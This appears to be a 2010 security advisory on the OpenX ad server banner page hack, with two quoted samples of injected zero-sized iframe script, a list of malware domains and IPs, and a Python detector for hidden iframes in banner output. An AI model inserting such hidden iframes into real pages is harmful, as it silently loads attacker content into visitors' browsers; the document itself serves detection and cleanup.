
OpenX Banner Page Hack

Updated: September 8, 2010

The OpenX banner page hack places a malicious JavaScript or iframe into the banner page (/www/delivery/ajs.php) produced by an OpenX ad server. This is sometimes accomplished with a plugin; in other cases the code is injected into the OpenX database. On some of the hacked ad servers, the hackers have also inserted backdoor scripts, which give them remote access to the ad server. The hack appears to be able to infect ad servers running versions up to 2.8.4. OpenX has not provided release notes or any other information on what changes were made in 2.8.5. A previous hack infected ad servers last December and was patched in version 2.8.3.

Recent Script Formats:

document.write('iframe src="http://ads.fake-isp.com/stats?counter=8140" width=0 height=0></iframe>');

<"+"iframe src=\"http://liveinternit.com/?1\" width=\"0\" height=\"0\" frameborder=\"0\"><"+"/iframe>

Recent Malware Domains: google-analitics.net, newspickerdot.com, newtickepicker.com, alphapopup.com, betapopup.com, tracker.ads.is, elnkvdgtbui.com, liveinternit.com, worldwesttrans.com, liveinterneta.info, waycity.net, trfafsegh.com, appledrink.net, apple-drink.com, wakesone.com, adturbodomain.com, doubleclickredirect.com, ads.fake-isp.com, morolight.net, plutoday.com, ads.imagetemplate.com, smallsun.net, banan.uk.to, on-sunday.net, smallsun.net, minutesun.net, njgya.com, googleanalyticsz.com, googleanalyticz.com, mjgjo.com, green-fast.net, whoiz.shit.la, storesigma.com, stalkx.qc.to, googleredirector.com, fortraffic001.com, svyazko.eba.la, googleredirector2.com, gooogleananalytics.com, banan.biz.tm, trafficbiz003.com, mashckinvalery.com, 85.234.190.0, 85.234.190.42, 194.8.250.0, 194.8.250.211, blamesslek.com
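One way to check a saved copy of the /www/delivery/ajs.php output for the two script formats above, as an added example (not code from the original page or from OpenX): it joins split string literals, unescapes quotes, and reports zero-sized iframes whose host is not on an allowlist. The function names, the allowed_hosts parameter and ads.example.com are assumptions; the sample strings are constructed from the formats quoted on this page.

```python
import re
from urllib.parse import urlparse

# Constructed test inputs: the first two reuse the script formats quoted on this page.
SAMPLE_DOCWRITE = r"""document.write('iframe src="http://ads.fake-isp.com/stats?counter=8140" width=0 height=0></iframe>');"""
SAMPLE_SPLIT = r'''<"+"iframe src=\"http://liveinternit.com/?1\" width=\"0\" height=\"0\" frameborder=\"0\"><"+"/iframe>'''
SAMPLE_CLEAN = r"""document.write('<a href="http://ads.example.com/ck.php"><img src="http://ads.example.com/b.png" width="468" height="60"></a>');"""

# Adjacent string literals joined by "+", as in <"+"iframe
_CONCAT = re.compile(r"""["']\s*\+\s*["']""")
# Opening iframe tag; "<" is optional because the first sample appears without it.
_IFRAME = re.compile(r"<?\s*(?<![/\w])iframe\b([^>]*)>", re.I)
_ATTR = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]+)""")


def normalize(js):
    """Undo the light obfuscation in the samples: split literals and escaped quotes."""
    return _CONCAT.sub("", js).replace('\\"', '"').replace("\\'", "'")


def hidden_iframes(js, allowed_hosts=()):
    """Return (host, src) for every zero-sized iframe whose host is not allowlisted."""
    hits = []
    for tag in _IFRAME.finditer(normalize(js)):
        attrs = {k.lower(): v for k, v in _ATTR.findall(tag.group(1))}
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        zero = attrs.get("width") in ("0", "0px") or attrs.get("height") in ("0", "0px")
        if src and zero and host not in allowed_hosts:
            hits.append((host, src))
    return hits


if __name__ == "__main__":
    # ads.example.com stands in for the ad server's own hostname (assumption).
    for name, body in [("docwrite", SAMPLE_DOCWRITE), ("split", SAMPLE_SPLIT), ("clean", SAMPLE_CLEAN)]:
        print(name, hidden_iframes(body, allowed_hosts={"ads.example.com"}))
```

A hit on banner output means the plugin list and the banner rows in the OpenX database both need review, since the page names both as injection points.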

